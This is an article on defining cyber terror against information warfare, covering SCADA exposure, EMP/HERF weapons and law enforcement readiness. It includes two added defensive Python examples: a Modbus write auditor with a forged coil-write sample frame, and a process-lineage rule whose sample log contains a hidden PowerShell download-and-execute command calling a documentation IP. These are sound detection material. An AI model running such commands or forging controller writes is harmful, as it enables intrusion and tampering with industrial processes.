By William L. Tafoya, Ph.D.
Anyone ever misquoted recognizes the importance of context. Wrong assumptions about concepts, words, and phrases easily lead to misunderstanding. In the law enforcement community, officers who use a weapon in the line of duty to defend themselves or innocent bystanders may kill but not murder. Context often serves as the crucial variable justifying the use of deadly force. Murder is always killing, but killing is not always murder. Similarly, accurate knowledge of the context and targets of cyber attacks enhances clarity and helps to avoid obscuring intent.
“Cyber terrorism is a component of information warfare, but information warfare is not...cyber terrorism. For this reason, it is necessary to define these topics as separate entities.”1 Said another way, undefined and misunderstood terms easily could lead a conversation to proceed along parallel lines rather than an intersecting track. Thus, differentiating concepts and terms is important, as in the case of understanding what cyber terror is and what it is not.
Dorothy Denning, one often-cited expert, describes but does not define information warfare (IW): “Information warfare consists of offensive and defensive operations against information resources of a ‘win-lose’ nature.” Further, “Information warfare is about operations that target or exploit information resources.”2 Nevertheless, several secondary and tertiary sources term her description “Denning’s Definition.”3 Other researchers assert that “Information warfare is combat operations in a high-tech battlefield environment in which both sides use information technology means, equipment, or systems in a rivalry over the power to obtain, control, and use information.”4
IW has several variants. Electronic warfare (EW), primarily a military term, is older than IW and dates back to World War II. Information operations (IO) is the more contemporary military nomenclature. EW and IO both are treated here as synonymous with IW. None of the three, however, is synonymous with cyber terror. IW, EW, and IO encompass the use of cryptology (cryptography and cryptanalysis), radar jamming, high-altitude aerial reconnaissance, electronic surveillance, electronically acquired intelligence, and steganography. Cyber terrorists may use these same tools. The distinction, however, is not the technological tools employed but the context and target.
In 1991 during Operation Desert Storm, coalition forces reportedly used IW, EW, and IO through the clandestine introduction of viruses and logic bombs into Iraqi Republican Guard (IRG) command-and-control-center computers and peripherals, causing the disruption and alteration of the targeting and launching of Scud missiles.5 The reliability of that account has since been questioned, but the point it illustrates stands: military combatants engaging one another on the battlefield constitutes IW, EW, and IO. Attacking the largely civilian critical infrastructure is not warfare, but terrorism—cyber terror. But, how does cyber terror differ from IW, EW, and IO?
Dr. Tafoya, a retired FBI special agent, is the coordinator of and a professor in the Information Protection and Security Program at the University of New Haven.
The term was coined in the 1980s by Barry Collin who discussed this dynamic of terrorism as transcendence from the physical to the virtual realm and “the intersection, the convergence of these two worlds....”6 The Center for Strategic and International Studies (CSIS) has defined it as “the use of computer network tools to shut down critical national infrastructures (e.g., energy, transportation, government operations) or to coerce or intimidate a government or civilian population.”7 The author defines cyber terror as “the intimidation of civilian enterprise through the use of high technology to bring about political, religious, or ideological aims, actions that result in disabling or deleting critical infrastructure data or information.”
As an illustration of scale, this article does not compare to the holdings of the Library of Congress. The loss of the former would be traumatic to the author, but would impact few other people. Loss of the latter, likely irreplaceable, would prove devastating if a cyber attack deleted those files. Of course, neither could compare to the loss of one human life. But, if data or information from any of the nation’s critical infrastructure databases were attacked and destroyed, that certainly would impact quality of life.
One expert asserted that if people wanted to know how much to spend on information security, they should calculate the cost of replacing their hard drives and databases in the event they became intentionally wiped out—then, double that estimate.8 Recently, a graduate student observed that “Cyber terrorism is a critical threat to national security and public policy. The intelligence community (IC) is at a turning point because it is difficult to catch a criminal who establishes an identity in cyberspace. Further, [we are at] a critical point in [time] for public policy because the government will have to devise regulations of electronic data transfer for public, as well as private, information that can be identified and accessed via the Internet.”9
Although some experts assert that no credible evidence exists that terrorists have initiated cyber attacks, groups, such as Hamas and Hezbollah, allegedly undertook such attacks more than a decade ago.10 “Lone wolves” have perpetrated more recent ones. The highest levels of government have emphasized the need to focus on this specter.11
What are the most vulnerable targets of cyber terrorists? What constitutes the significance of the targets and the magnitude of the threat? Does it matter what the threat is called? Does cyber terror constitute an element of computer crime?
More than a half century later, not even the most prominent authorities have reached a consensus about what constitutes computer crime. According to one of the pioneers of this genre, the earliest occurrence of such abuse occurred in 1958.12 The first prosecution under federal law, the Computer Fraud and Abuse Act, Title 18, Section 1030, U.S. Code, was of Robert Tappan Morris, Jr., then a graduate student of computer science, who unleashed the so-called Internet Worm in 1988.13
Along the time continuum, this is where the line begins to blur between “conventional” computer crime and what the author refers to as cyber terror. This genus includes the Melissa virus (1999), ILOVEYOU worm (2000), Code Red worm (2001), Blaster worm (2003), and Conficker worm (2008). These attacks differ from extortion, fraud, identity theft, and various scams, all of which certainly are malicious. However, acts of cyber terror as here defined impact society—even the nation—not just an individual, elements of the business sector, or government agencies.
Space limitations do not allow for an incident-by-incident accounting of cyber terror episodes. One example is the case of U.S. v. Mitra. In 2003, Rajib K. Mitra undertook an ongoing attack on a police emergency radio system. Initially, authorities investigated Mitra’s cyber assaults as a violation of Wisconsin state law, but, ultimately, deemed them attacks on the critical infrastructure. The case was prosecuted under federal law (Computer Fraud and Abuse Act). Mitra, a lone wolf, was tried and convicted on March 12, 2004, and later sentenced to 96 months imprisonment. Subsequently, his appeal failed. U.S. Seventh Circuit Court of Appeals judges ruled unanimously, noting that “it is impossible to fathom why any sane person would think that the penalty for crippling an emergency-communication system on which lives may depend should [not] be higher than the penalty for hacking into a Web site to leave a rude message.”14
Clearly, law enforcement agencies need to stay well informed about what the experts think. Most contemporary professionals remain cautious. However, if people wait until they have absolute proof positive, it may be too late. The cyber trends seem clear. Over the course of approximately 13 years, both the number and frequency of instances of digital disorder have intensified, and the sophistication and diversity of types of cyber attacks have increased.
One high-profile specialist contended that “stories of terrorists controlling the power grid, or opening dams, or taking over the air traffic control network and colliding airplanes, are unrealistic scare stories.” He went on to invoke a cost-benefit perspective: “We need to understand the actual risks. Here’s the critical question we need to answer: Just how likely is a terrorist attack, and how damaging is it likely to be?”15 Another authority notes that “threats to the critical infrastructure are becoming increasingly frequent” and goes on to say, “Cyber attacks are one of the greatest threats to international peace and security in the 21st Century.”16 Where there is smoke, is fire far behind? And, what about the future? What technological innovations will impact the ability to serve and protect in the near-term future?
Concerning the use of the term cyber terror, do experts resemble the proverbial blind men who feel different parts of the same elephant? On the near-term horizon, technological wonders will arise of which the unscrupulous will avail themselves, just as others before them have done.17 But, where do vulnerabilities lie, and what technological tools will terrorists use?
Not the only concern, but certainly a major worry, are supervisory control and data acquisition (SCADA) systems. Closely related are distributed control systems (DCS) and programmable logic controllers (PLCs). SCADA systems are more ubiquitous than personal computers and laptops combined. Without onsite human intervention, they automatically and remotely collect data from sensors in devices used for industrial processing. They store information in databases for subsequent central-site management and processing.
SCADA systems have existed since the 1960s. In the early days, they were stand-alone, and few were networked. Today, many are reachable, directly or through corporate networks, from the Internet. This may be great as a cost-cutting measure, but not from an information security perspective. Quietly and without fanfare, SCADA systems have proliferated rapidly—for starters, in the electric, oil, and gas; water treatment; waste management; and maritime, air, railroad, and automobile traffic control industries. SCADA systems also are embedded in “telephone and cell phone networks, including 911 emergency services.”18
These obscure little drone-like computer systems have little built-in security; they seldom sit behind a firewall, and few run antivirus software. The protocols they speak were designed for isolated networks and typically carry no authentication, so any host that can reach a controller can issue it commands. They are spread far and wide across the nation, even in some of the most remote places imaginable.19 One anonymous hacker interviewed for a television program said, “SCADA is a standard approach toward control systems that pervades everything from water supply to fuel lines.” He goes on to say that the operating systems these systems run leave them vulnerable.20
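The lack of authentication in industrial protocols is the concrete reason an exposed controller is dangerous: a write request is honored regardless of who sends it. The following Python example, added here and not part of the original article, parses Modbus/TCP frames (the widely used SCADA protocol) from captured traffic and flags write operations that do not come from an approved engineering workstation. The frames, source addresses, and the allow-list of permitted writers are constructed for illustration.

```python
"""Flag unauthenticated Modbus/TCP write requests seen on the wire.

Modbus/TCP frames have a 7-byte MBAP header (transaction id, protocol id,
length, unit id) followed by a function code and data. There is no
credential field anywhere in the frame, so the only control available to
a defender is to watch who is issuing writes.
"""
import struct
from dataclasses import dataclass

# Function codes that change process state (coil/register writes).
WRITE_FUNCTIONS = {
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
}

# Hypothetical allow-list: the one engineering workstation permitted to write.
ALLOWED_WRITERS = {"10.0.5.10"}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function: int
    address: int      # starting coil/register address, when present
    payload: bytes    # remainder of the PDU after the address


def build_request(tid: int, unit: int, function: int, data: bytes) -> bytes:
    """Construct a Modbus/TCP request frame (used here to fabricate samples)."""
    # MBAP length counts the unit id, the function code and the data.
    header = struct.pack(">HHHB", tid, 0, 2 + len(data), unit)
    return header + bytes([function]) + data


def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Parse a Modbus/TCP ADU, rejecting frames whose header disagrees with size."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"unexpected protocol id {pid}")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    function = frame[7]
    pdu = frame[8:]
    address = struct.unpack(">H", pdu[:2])[0] if len(pdu) >= 2 else 0
    return ModbusRequest(tid, unit, function, address, pdu[2:])


def audit(packets):
    """packets: iterable of (source_ip, frame). Returns (src, function, reason) alerts."""
    alerts = []
    for src, frame in packets:
        try:
            req = parse_modbus_tcp(frame)
        except ValueError as err:
            alerts.append((src, None, f"malformed frame: {err}"))
            continue
        if req.function in WRITE_FUNCTIONS and src not in ALLOWED_WRITERS:
            alerts.append((src, req.function,
                           f"{WRITE_FUNCTIONS[req.function]} on unit {req.unit_id} "
                           f"at address {req.address} from unapproved host"))
    return alerts


# Constructed sample capture: one benign read, one rogue write from an outside
# address (203.0.113.0/24 is a documentation range), one approved write, one
# truncated frame.
SAMPLE_PACKETS = [
    ("10.0.5.10", build_request(1, 1, 0x03, b"\x00\x00\x00\x0a")),   # read 10 registers
    ("203.0.113.7", build_request(2, 1, 0x05, b"\x00\x10\xff\x00")), # force coil 16 ON
    ("10.0.5.10", build_request(3, 1, 0x10, b"\x00\x00\x00\x01\x02\x00\x01")),
    ("203.0.113.7", b"\x00\x04\x00\x00"),                            # truncated
]


def sample_alerts():
    return audit(SAMPLE_PACKETS)


if __name__ == "__main__":
    for src, fc, reason in sample_alerts():
        print(f"{src}: {reason}")
```

Two alerts result: the coil write from 203.0.113.7 and the truncated frame from the same host. The read request and the write from the approved workstation pass silently. In a real deployment the allow-list would come from the plant's asset inventory, and the same logic could run as a passive sensor on a network tap, since blocking traffic inline risks interfering with the process being controlled.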
Electromagnetic pulse (EMP) bombs and high-energy radio frequency (HERF) weapons differ from the malicious code, computer viruses, and worms of yesteryear. While the latter remain worrisome, EMP and HERF are serious, if less familiar, perils of the near-term technological age. EMP devices are compact, and perpetrators can use them to overload computer circuitry. These devices can destroy a computer’s motherboard and permanently, irretrievably erase data in memory storage devices.21 Like EMPs, HERF devices use electromagnetic radiation.22 They, too, deliver heat, mechanical, or electrical energy to a target. The difference is that individuals can focus HERF devices on a specific target using a parabolic reflector.23 According to these sources, HERF does not cause permanent damage; EMP does.24 An array of demonstrations of the power of such homemade devices is depicted at several Web sources, such as YouTube.
Two decades ago, an expert warned about Internet agents, including bots (robots), Web crawlers, Web spiders, and Web scutters, software applications that traverse the Internet while undertaking repetitive tasks, such as retrieving linked pages, specified words or phrases, or e-mail addresses.25 Although bots have served benign functions for many years, such as indexing pages for search engines, the same machinery harvests e-mail addresses for spammers, and bots now loom large as a near-term future IC and policing issue. More recent research supports this contention. Given these forecasts, the question is not what might happen tomorrow, but, rather, how well-prepared law enforcement will be to protect and serve.
Implications for Law Enforcement
Federal agencies responsible for investigating terrorism, including cyber terror, must remain vigilant. This includes ensuring adequate funding for staffing, equipment, and training. But, beyond that, local law enforcement officers must encourage citizens to be alert and to report suspicious behavior. Many local law enforcement agencies have had useful resources, such as citizens’ police academies, for decades. These programs can educate taxpayers about activity in the physical realm that should be reported. However, what about transcendence to the virtual realm? Since 1996, the FBI’s InfraGard Program, an information sharing and analysis effort, has focused on marshaling the talents of members of America’s information security (INFOSEC) community.26 However, what of “main street USA”?
“See Something, Say Something” is a terrific crime prevention slogan promoted in New York City.27 It seems to have resonated recently in Times Square when an observant man, a street vendor and Vietnam veteran, alerted the New York Police Department to the SUV used in what turned out to be, fortunately, a failed Taliban-sponsored car-bombing attempt.28 Any such program should be augmented to provide to its participants examples of behavior in the business community, including those in a work environment, that could alert authorities to precursors of potential cyber misdeeds. Just as someone does not need specialized education to recognize threats in real life, a layperson given concrete examples can learn to recognize these digital threats. One authority notes that “an example of suspicious behavior might be a bit of malicious program attempting to install itself from opening an office document.” To reduce the threat, security teams could add a “‘behavior’ layer to [antivirus products].”29 Of course, this suggestion could unnerve many civil liberty-oriented watchdog organizations; there is no reason not to include such agencies in the discussion, planning, and implementation of the augmentation here proposed. What, then, is the bottom line?
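The “behavior layer” the quoted authority describes is a rule over process lineage rather than a file signature: an office document should not launch a scripting host or an executable dropped in a user-writable folder. The following Python example, added here and not from the original article or the cited authority, runs such a rule over process-creation records. The log format (tab-separated timestamp, host, parent image, child image, command line), the hostnames and paths, and the download URL in the sample are all constructed; real endpoint telemetry carries the same fields.

```python
"""Behavior rule: an Office application spawning a script host or a dropped binary.

Signature-based antivirus looks at the document; this rule looks at what the
document's process does next, which is what the "behavior layer" means.
"""
import ntpath  # Windows path handling works on any platform

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe"}
# Directories an ordinary user can write to, where macros typically drop payloads.
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")

# Constructed sample events: (timestamp, host, parent image, child image, command line).
SAMPLE_EVENTS = [
    ("2011-03-01T09:14:02Z", "WS-17", r"C:\Windows\explorer.exe",
     r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.doc"'),
    ("2011-03-01T09:14:05Z", "WS-17",
     r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c powershell -w hidden -nop -c IEX((New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.9/a.ps1'))"),
    ("2011-03-01T09:14:06Z", "WS-17", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -nop -c IEX((New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.9/a.ps1'))"),
    ("2011-03-01T09:15:10Z", "WS-17",
     r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe", "svchost.exe"),
    ("2011-03-01T09:16:00Z", "WS-22",
     r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),   # legitimate print helper
    ("2011-03-01T09:17:30Z", "WS-22", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]
SAMPLE_LOG = "\n".join("\t".join(fields) for fields in SAMPLE_EVENTS)


def parse_line(line: str) -> dict:
    """Split one tab-separated process-creation record into named fields."""
    ts, host, parent, child, cmdline = line.split("\t", 4)
    return {"time": ts, "host": host, "parent": parent, "child": child, "cmdline": cmdline}


def evaluate(event: dict):
    """Return a reason string if the event matches the rule, else None."""
    parent = ntpath.basename(event["parent"]).lower()
    child = ntpath.basename(event["child"]).lower()
    if parent not in OFFICE_APPS:
        return None
    if child in SCRIPT_HOSTS:
        return f"{parent} spawned scripting host {child}"
    if any(d in event["child"].lower() for d in DROP_DIRS):
        return f"{parent} launched executable from user-writable directory"
    return None


def run(log_text: str = SAMPLE_LOG) -> list:
    """Apply the rule to every record and return the matching events with reasons."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        reason = evaluate(event)
        if reason:
            alerts.append({**event, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in run():
        print(f"{a['time']} {a['host']}: {a['reason']} ({a['cmdline']})")
```

Two of the six records match: Word launching cmd.exe (which in turn runs the hidden PowerShell downloader) and Word launching an executable named svchost.exe from the user’s Temp folder. Word launching splwow64.exe, a normal printing helper, does not match, which is the kind of benign child a rule must tolerate to be usable. A production rule would also walk the process tree so the PowerShell grandchild is tied back to the document rather than judged on its own.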
Earthquakes, hurricanes, tsunamis, tornadoes, volcanoes, toxic spills, forest fires, and shark attacks do not occur with great frequency. Precautions, nevertheless, are in place to protect people from the physical threats posed when these natural but seldom-occurring violent events occur. Although they cannot be forecast with great accuracy, we are prepared for them. Similarly, law enforcement agencies should be prepared to deal with the aftermath of hard-to-forecast, infrequent cyber attacks on the nation’s critical infrastructure.
Criminals are menacing our cyber shores, preparing to launch a large-scale attack. What is clear is that it will happen. What is not obvious is by whom or when. Respected INFOSEC authorities have made a compelling case for the “swarm”—attacks via different paths by dispersed cells. Al Qaeda already has demonstrated an understanding of the technique.30 Other countries, such as India, Saudi Arabia, China, France, Brazil, and Spain, already have experienced such attacks.31 Additionally, well-known U.S. companies have reported major breaches targeting source code.32
Cyber terrorists are scanning ports and probing our digital fortifications as they endeavor to identify vulnerabilities. Daily, crackers and terrorists are skulking, battering firewalls, and learning more each time they do so. Clearly, preparations to thwart such attacks are necessary.
The skills, tools, and techniques are the same, but information warfare is conducted between military combatants; cyber terrorism targets civilians. Cyber terrorists indiscriminately will attack the nation’s critical infrastructure and civilians—the innocent. Thus, the context and targets, not the technological tools or frequency of attacks, are the more appropriate delimiters that distinguish cyber terror from information warfare.
Some of these criminals are being caught and prosecuted, but more remain undetected. To best serve its motto, “to protect and serve,” law enforcement must proactively guard this country’s national security on every front.